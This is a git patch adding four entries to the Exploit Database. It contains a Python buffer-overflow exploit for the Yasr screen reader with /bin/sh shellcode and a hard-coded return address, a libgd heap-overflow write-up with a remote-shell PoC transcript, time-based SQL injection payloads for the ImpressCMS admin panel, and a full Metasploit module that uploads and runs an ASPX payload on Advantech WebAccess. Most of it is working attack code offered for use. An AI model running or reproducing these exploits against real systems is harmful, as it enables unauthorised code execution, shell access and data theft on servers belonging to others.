From fe5081847ef1aec1f127833853786203edf4941a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 Apr 2016 05:02:48 +0000 Subject: [PATCH] DB: 2016-04-27 4 new exploits Yasr Screen Reader 0.6.9 - Local Buffer Overflow Advantech WebAccess Dashboard Viewer Arbitrary File Upload libgd 2.1.1 - Signedness Heap Overflow ImpressCMS 1.3.9 - SQL Injection --- files.csv | 4 + platforms/linux/local/39734.py | 66 ++++++++ platforms/linux/remote/39736.txt | 241 ++++++++++++++++++++++++++++++ platforms/php/webapps/39737.txt | 84 +++++++++++ platforms/windows/remote/39735.rb | 130 ++++++++++++++++ 5 files changed, 525 insertions(+) create mode 100755 platforms/linux/local/39734.py create mode 100755 platforms/linux/remote/39736.txt create mode 100755 platforms/php/webapps/39737.txt create mode 100755 platforms/windows/remote/39735.rb diff --git a/files.csv b/files.csv index 57a0e2148..42beed26c 100755 --- a/files.csv +++ b/files.csv @@ -35945,3 +35945,7 @@ id,file,description,date,author,platform,type,port 39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 +39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 +39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80 +39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 +39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 diff --git a/platforms/linux/local/39734.py b/platforms/linux/local/39734.py new file mode 100755 index 000000000..1a38802ea --- /dev/null +++ b/platforms/linux/local/39734.py @@ -0,0 +1,66 @@ +''' +# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com +# Program affected: General-purpose console screen reader +# Version: 0.6.9-5 +# +# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org +# Program description: Yasr is a general-purpose console screen reader +for GNU/Linux and other Unix-like operating systems. +# Kali Linux 2.0 package: pool/main/y/yasr/yasr_0.6.9-5_i386.deb +# MD5sum: 910f4b41fd09d5486b935097dc8dd2f8 +# Website: http://yasr.sourceforge.net/ +# +# +# Starting program: /usr/bin/yasr -p $(python -c 'print "\x90"*258') +# [Thread debugging using libthread_db enabled] +# Using host libthread_db library +"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1". +# Program received signal SIGSEGV, Segmentation fault. +# +# 0x90909090 in ?? () +# +#gdb$ backtrace +#0 0xb7fdebe0 in __kernel_vsyscall () +#1 0xb7e33367 in __GI_raise (sig=sig@entry=0x6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#2 0xb7e34a23 in __GI_abort () at abort.c:89 +#3 0xb7e71778 in __libc_message (do_abort=do_abort@entry=0x2, +fmt=fmt@entry=0xb7f67715 "*** %s ***: %s terminated\n") at +../sysdeps/posix/libc_fatal.c:175 +#4 0xb7f01b85 in __GI___fortify_fail (msg=msg@entry=0xb7f67696 +"buffer overflow detected") at fortify_fail.c:31 +#5 0xb7effc3a in __GI___chk_fail () at chk_fail.c:28 +''' + +import os, subprocess + +def run(): + try: + print "# Yasr Console Screen Reader - Buffer Overflow by Juan Sacco" + print "# This exploit is for educational purposes only" + # JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*298 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*12 + eip = "\xd2\xf3\xff\xbf" + subprocess.call(["yasr ",'-p ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, Yasr Console Reader - Not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Snap! Something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit Yasr 0.6.9-5 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/linux/remote/39736.txt b/platforms/linux/remote/39736.txt new file mode 100755 index 000000000..97d6b5b1c --- /dev/null +++ b/platforms/linux/remote/39736.txt @@ -0,0 +1,241 @@ +Overview +======== + +libgd [1] is an open-source image library. It is perhaps primarily used +by the PHP project. It has been bundled with the default installation +of PHP since version 4.3 [2]. + +A signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which +may result in a heap overflow when processing compressed gd2 data. + + +Details +======= + +4 bytes representing the chunk index size is stored in a signed integer, +chunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers: + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 53 typedef struct { +| 54 int offset; +| 55 int size; +| 56 } +| 57 t_chunk_info; +`---- + + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 65 static int +| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy, +| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy, +| 68 t_chunk_info ** chunkIdx) +| 69 { +| ... +| 73 t_chunk_info *cidx; +| ... +| 155 if (gd2_compressed (*fmt)) { +| ... +| 163 for (i = 0; i < nc; i++) { +| ... +| 167 if (gdGetInt (&cidx[i].size, in) != 1) { +| 168 goto fail2; +| 169 }; +| 170 }; +| 171 *chunkIdx = cidx; +| 172 }; +| ... +| 181 } +`---- + + +`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then +allocates memory for the compressed data based on the value of the +largest chunk size: + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 371|637 if (gd2_compressed (fmt)) { +| 372|638 /* Find the maximum compressed chunk size. */ +| 373|639 compMax = 0; +| 374|640 for (i = 0; (i < nc); i++) { +| 375|641 if (chunkIdx[i].size > compMax) { +| 376|642 compMax = chunkIdx[i].size; +| 377|643 }; +| 378|644 }; +| 379|645 compMax++; +| ...|... +| 387|656 compBuf = gdCalloc (compMax, 1); +| ...|... +| 393|661 }; +`---- + + +A size of <= 0 results in `compMax' retaining its initial value during +the loop, followed by it being incremented to 1. Since `compMax' is +used as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation +for `compBuf'. + +This is followed by compressed data being read to `compBuf' based on the +current (potentially negative) chunk size: + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in) +| 340 { +| ... +| 413 if (gd2_compressed (fmt)) { +| 414 +| 415 chunkLen = chunkMax; +| 416 +| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, +| 418 compBuf, +| 419 chunkIdx[chunkNum].size, +| 420 (char *) chunkBuf, &chunkLen, in)) { +| 421 GD2_DBG (printf ("Error reading comproessed chunk\n")); +| 422 goto fail; +| 423 }; +| 424 +| 425 chunkPos = 0; +| 426 }; +| ... +| 501 } +`---- + + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h) +| 586 { +| ... +| 713 if (!gd2_compressed (fmt)) { +| ... +| 731 } else { +| 732 chunkNum = cx + cy * ncx; +| 733 +| 734 chunkLen = chunkMax; +| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset, +| 736 compBuf, +| 737 chunkIdx[chunkNum].size, +| 738 (char *) chunkBuf, &chunkLen, in)) { +| 739 printf ("Error reading comproessed chunk\n"); +| 740 goto fail2; +| 741 }; +| ... +| 746 }; +| ... +| 815 } +`---- + + +The size is subsequently interpreted as a size_t by `fread()' or +`memcpy()', depending on how the image is read: + +libgd-2.1.1/src/gd_gd2.c: +,---- +| 221 static int +| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf, +| 223 uLongf * chunkLen, gdIOCtx * in) +| 224 { +| ... +| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) { +| 237 return FALSE; +| 238 }; +| ... +| 251 } +`---- + +libgd-2.1.1/src/gd_io.c: +,---- +| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx) +| 212 { +| 213 return (ctx->getBuf)(ctx, buf, size); +| 214 } +`---- + + +For file contexts: + +libgd-2.1.1/src/gd_io_file.c: +,---- +| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f) +| 53 { +| ... +| 67 ctx->ctx.getBuf = fileGetbuf; +| ... +| 76 } +| ... +| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size) +| 93 { +| 94 fileIOCtx *fctx; +| 95 fctx = (fileIOCtx *)ctx; +| 96 +| 97 return (fread(buf, 1, size, fctx->f)); +| 98 } +`---- + + +And for dynamic contexts: + +libgd-2.1.1/src/gd_io_dp.c: +,---- +| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag) +| 75 { +| ... +| 95 ctx->ctx.getBuf = dynamicGetbuf; +| ... +| 104 } +| ... +| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len) +| 257 { +| ... +| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen); +| ... +| 284 } +`---- + + +PoC +=== + +Against Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]: + +,---- +| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php +| [*] this may take a while +| [*] offset 912 of 10000... +| [+] connected to 1.2.3.4:5555 +| id +| uid=33(www-data) gid=33(www-data) groups=33(www-data) +| +| uname -a +| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC +| 2016 x86_64 x86_64 x86_64 GNU/Linux +| +| dpkg -l|grep -E "php5-(fpm|gd)" +| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ... +| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ... +| +| cat upload.php +| +`---- + + +Solution +======== + +This bug has been fixed in git HEAD [4]. + +Full Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip + +Footnotes +_________ + +[1] [http://libgd.org/] +[2] [https://en.wikipedia.org/wiki/Libgd] +[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074] +[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19] diff --git a/platforms/php/webapps/39737.txt b/platforms/php/webapps/39737.txt new file mode 100755 index 000000000..0c8f4a86b --- /dev/null +++ b/platforms/php/webapps/39737.txt @@ -0,0 +1,84 @@ +============================================= +MGC ALERT 2016-002 +- Original release date: April 8, 2016 +- Last revised: April 21, 2016 +- Discovered by: Manuel García Cárdenas +- Severity: 7,1/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9 + +II. BACKGROUND +------------------------- +ImpressCMS is a community developed Content Management System for easily +building and maintaining a dynamic web site. + +III. DESCRIPTION +------------------------- +This bug was found using the portal with authentication as administrator. +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. + +It is possible to inject SQL code in the variable +"quicksearch_mod_profile_Field" on the page +"/modules/profile/admin/field.php". + +IV. PROOF OF CONCEPT +------------------------- +The following URL's and parameters have been confirmed to all suffer from +Time Based Blind SQL injection. + +quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM +(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE +'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15 + +quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM +(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE +'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15 + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +ImpressCMS <= v1.3.9 + +VII. SOLUTION +------------------------- +Install vendor patch. + +VIII. REFERENCES +------------------------- +http://www.impresscms.org/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +April 8, 2016 1: Initial release +April 21, 2016 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas +April 8, 2016 2: Send to vendor +April 15, 2016 3: New contact to vendor with no response +April 21, 2016 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester diff --git a/platforms/windows/remote/39735.rb b/platforms/windows/remote/39735.rb new file mode 100755 index 000000000..1359d1bc3 --- /dev/null +++ b/platforms/windows/remote/39735.rb @@ -0,0 +1,130 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload", + 'Description' => %q{ + This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. + + This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations + of Advantech WebAccess. Authentication is not required to exploit this vulnerability. + + The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within + the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to + upload arbitrary code (instead of an image) to the server, which will then be executed under the + high-privilege context of the IIS AppPool. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'rgod', # Vulnerability discovery + 'Zhou Yu <504137480[at]qq.com>' # MSF module + ], + 'References' => [ + [ 'CVE', '2016-0854' ], + [ 'ZDI', '16-128' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01'] + ], + 'Platform' => 'win', + 'Targets' => [ + ['Advantech WebAccess 8.0', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 5 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/']) + ], self.class) + end + + def version_match(data) + # Software Build : 8.0-2015.08.15 + fingerprint = data.match(/Software\sBuild\s:\s(?\d{1,2}\.\d{1,2})-(?\d{4})\.(?\d{1,2})\.(?\d{1,2})/) + fingerprint['version'] unless fingerprint.nil? + end + + def vuln_version? + res = send_request_cgi( + 'method' => 'GET', + 'uri' => target_uri.to_s + ) + + if res.redirect? + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(res.redirection) + ) + end + + ver = res && res.body ? version_match(res.body) : nil + true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false + end + + def check + if vuln_version? + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def upload_file?(filename, file) + uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx') + + data = Rex::MIME::Message.new + data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"') + data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => "waUserName=admin", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + ) + true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false + end + + def exec_file?(filename) + uri = normalize_uri(target_uri) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri + ) + + uri = normalize_uri(target_uri, 'WADashboard', filename) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => res.get_cookies + ) + true ? res && res.code == 200 : false + end + + def exploit + unless vuln_version? + print_status("#{peer} - Cannot reliably check exploitability.") + return + end + filename = "#{Rex::Text.rand_text_alpha(5)}.aspx" + filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe) + + print_status("#{peer} - Uploading malicious file...") + return unless upload_file?(filename, filedata) + + print_status("#{peer} - Executing #{filename}...") + return unless exec_file?(filename) + end +end